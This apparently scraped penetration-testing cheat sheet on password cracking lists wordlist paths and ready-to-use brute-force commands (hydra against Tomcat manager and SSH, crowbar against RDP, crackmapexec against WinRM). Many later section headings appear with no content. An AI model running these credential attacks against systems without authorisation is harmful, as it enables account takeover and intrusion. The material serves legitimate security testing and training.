Password Cracking
Wordlist
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/others/names.txtBruteforce
Tomcat GET
hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt http-get://<Target IP Address>:8080/manager/htmlRDP
crowbar -b rdp -s <Target IP Address> -u <Username> -C /usr/share/wordlists/rockyou.txt -n 1Evil-WinRM
crackmapexec winrm <Target IP Address> -d <Domain Name> -u <Username Listt> -p <Password List>SSH
hydra -l <Username> -P /usr/share/wordlists/rockyou.txt ssh://<Target IP Address> -s <Port>hydra -l <Username> -P /usr/share/wordlists/metasploit/unix_passwords.txt <Target IP Address> ssh -t 4 -VHTTP-GET
HTTP-POST
FTP
ZIP
WordPress
ASC
3
Import the ASC
Hash Crack
Hash Finder
NOTE: For the above command, paste the hash after entering that
Hashcat
John The Ripper
Linux
Windows
PDF
ZIP
SAM & SYSTEM
Keepass Database
SSH
Last updated